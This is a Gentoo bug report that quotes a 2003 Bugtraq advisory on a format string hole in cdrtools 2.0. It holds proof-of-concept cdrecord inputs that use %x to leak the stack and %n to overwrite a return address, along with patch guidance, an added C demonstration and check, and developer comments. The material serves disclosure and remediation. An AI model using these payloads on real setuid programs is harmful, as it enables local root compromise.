Bug 20997 - app-cdr/cdrtools
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: New packages (show other bugs)
Hardware: All Linux
Importance: Highest critical
Assignee: Gentoo Security
Reported: 2003-05-14 04:49 UTC by Daniel Ahlberg (RETIRED)
Modified: 2003-05-19 04:43 UTC (History)
Description Daniel Ahlberg (RETIRED) gentoo-dev 2003-05-14 04:49:07 UTC
cdrtools 2.0 Format String Vulnerability

From: Stefano Di Paola <st0r1e@libero.it>
To: bugtraq@securityfocus.com
Date: Yesterday 10.27.36

---------------------------------------------------------------------------- 
PACKAGE           : cdrtools
VERSION           : 2.0
SUMMARY           : Format String
SEVERITY          : local root exploit if suid (on several distros)
DATE              : 2003-05-05
---------------------------------------------------------------------------- 
 
 
Hi,
I would like to inform you that there is a format string vulnerability
in cdrecord 2.0, in particular in libscg/scsiopen.c at line 273, I
suppose:
 
-------------------------------------------------------------- 
   271          if (scg__open(scgp, devname) <= 0) { 
   272                  if (errs && scgp->errstr) 
 
>>>273                     js_snprintf(errs, slen, scgp->errstr);<<<< 
    
   274                  scg_sfree(scgp); 
   275                  return ((SCSI *)0); 
   276          } 
_______________________________________________________ 
!-------         W A R N I N G      -----------!   
!--- this  is an exploitable vulnerability! ---! 
!----------------------------------------------! 
Cdrecord is present in several distros as setuid program so this is a real 
security hole. 
 
e.g. 
$ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c 
 
Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jörg Schilling
scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x' 
devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x' 
scsibus: -2 target: -2 lun: -2 
Warning: Open by 'devname' is unintentional and not supported. 
./cdrecord: No such file or directory. Cannot open
'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242. 
Cannot open SCSI driver. 
./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you 
are root. 
As you can see, the last %x refers to AAAABBBBCCCC, so I can use %n for
overwriting anything I want:
e.g. I can find on the stack the location of the return address...
let's say 0xbffcffcc:
$./cdrecord dev=`printf  
"\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"` 
c/int.c 
.....snip.... 
(core dump) 
$ gdb   `which cdrecord`  core -q 
....snip... 
#0  0x3f in ?? () 
(gdb) bt 
#0  0x3f in ?? () 
#1  0x8065451 in scg_open () 
#2  0x8049a3b in main () 
... 
 
so it's exploitable. 
 
Solutions: 
 
A. Updated package can be found on: 
 
        ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz 
 
B. Replace line 273 of libscg/scsiopen.c with:
         js_snprintf(errs, slen, "%s", scgp->errstr);
 
C. remove the suid bit with: 
        chmod 755 `which cdrecord` 
 
 
 
Regards, 
Stefano Di Paola 
 
------------------ 
 
Stefano Di Paola 
Software Engineer 
stefano.dipaola1<at>tin<dot>it 
st0r1e<at>libero<dot>com
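The following is an added example written for this page; it is not code from the Bugtraq post, from cdrtools or from libscg. It models the line-273 pattern with a hypothetical build_errstr() that embeds the dev= argument in the error text (libscg's real errstr layout is assumed, not copied), shows fix B beside it, and adds a small check that counts the conversion directives an attacker string would inject when it is used as a format. The constructed device name uses "%%" rather than "%x" so the demonstration stays well-defined (no stray argument reads) while still proving that the vulnerable call parses the device name as a format string.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the error text scg__open() leaves in
   scgp->errstr: it embeds the device name, which comes straight from the
   attacker-controlled dev= argument. (Assumed layout, not libscg's own.) */
static void build_errstr(char *errstr, size_t len, const char *devname)
{
    snprintf(errstr, len,
             "No such file or directory. Cannot open '%s'. Cannot open SCSI driver.",
             devname);
}

/* The pattern at libscg/scsiopen.c line 273: errstr is passed as the
   FORMAT argument. Every % directive in devname is interpreted by snprintf;
   %x reads stack words that were never passed and %n writes to an address
   taken from the stack. Kept here only to show the defect. */
int scg_open_report_vuln(char *errs, size_t slen, const char *devname)
{
    char errstr[256];
    build_errstr(errstr, sizeof errstr, devname);
    return snprintf(errs, slen, errstr);
}

/* Fix B from the post: a literal format, errstr supplied as a %s argument. */
int scg_open_report_fixed(char *errs, size_t slen, const char *devname)
{
    char errstr[256];
    build_errstr(errstr, sizeof errstr, devname);
    return snprintf(errs, slen, "%s", errstr);
}

/* Check for data about to be used as a format: count the conversion
   directives an attacker gets to inject ("%%" is an escape and is skipped)
   and flag %n, the directive that turns a stack leak into a memory write. */
int count_conversions(const char *s, int *has_n)
{
    int n = 0;
    *has_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {        /* "%%" prints a single '%' */
            p++;
            continue;
        }
        n++;
        /* skip flags, width, precision and length modifiers */
        const char *q = p + 1;
        while (*q && strchr("-+ #0123456789.hlLqjzt", *q))
            q++;
        if (*q == 'n')
            *has_n = 1;
        if (*q)
            p = q;                /* resume after the conversion character */
    }
    return n;
}

int main(void)
{
    /* Constructed device name: "%%" keeps the demo well-defined while still
       showing that the vulnerable call parses the name as a format. */
    const char *devname = "AAAA|%%x";
    char out[512];
    int has_n, n;

    scg_open_report_vuln(out, sizeof out, devname);
    printf("vulnerable: %s\n", out);   /* the %% collapses to a single % */
    scg_open_report_fixed(out, sizeof out, devname);
    printf("fixed:      %s\n", out);   /* devname reproduced verbatim */

    n = count_conversions("AAAA|%x%x%x%n", &has_n);
    printf("directives in the post's style of payload: %d (has %%n: %d)\n",
           n, has_n);
    return 0;
}
```

The vulnerable variant prints the device name with the "%%" collapsed to "%", which is exactly the evidence that the string went through the format parser; the fixed variant reproduces it verbatim. With the post's real payload the same parser would consume "%x" directives from the stack and, with "%n", write a counter to an address the attacker placed there, which is why the count check treats any non-escaped "%" in such a string as a finding.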
Comment 1 Arcady Genkin (RETIRED) gentoo-dev 2003-05-14 12:21:33 UTC
We don't install cdrecord SUID root.  The users are free to do that, of course, and I think some GUI cd burners can do that for the user.

That said, it appears that the bug is fixed in 2.01_alpha14, which has been in the CVS (~arch-masked) since May 12.
Comment 2 Arcady Genkin (RETIRED) gentoo-dev 2003-05-14 12:22:17 UTC
I meant "the ebuild for which has been in the CVS..."
Comment 3 Daniel Ahlberg (RETIRED) gentoo-dev 2003-05-19 04:43:47 UTC
glsa sent